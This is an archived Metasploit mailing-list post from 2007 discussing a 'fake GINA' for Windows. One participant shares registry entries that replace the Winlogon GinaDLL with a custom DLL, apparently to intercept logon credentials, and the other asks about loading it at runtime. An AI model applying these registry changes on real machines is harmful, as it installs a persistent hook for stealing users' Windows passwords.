Metasploit mailing list archives
Fake Gina
From: jerome.athias at free.fr (Jerome Athias)
Date: Sun, 25 Mar 2007 20:41:16 +0200
actualy i use this: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "GinaDLL"="mscad.dll" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "SAS_S"=dword:00000001 and i wait a reboot i didn't go further on it but maybe we can find a way to have it working on the fly i will test it H D Moore wrote :
This sounds like a good idea. Whats the process for loading the new Gina? Can you load it at runtime, or do you need to update the registry entry and reboot? If you load it at runtime, how is this injected? Can you share your implementation? -HD
Current thread:
- Fake Gina Jerome Athias (Mar 25)
- <Possible follow-ups>
- Fake Gina 0x90 at hushmail.com (Mar 25)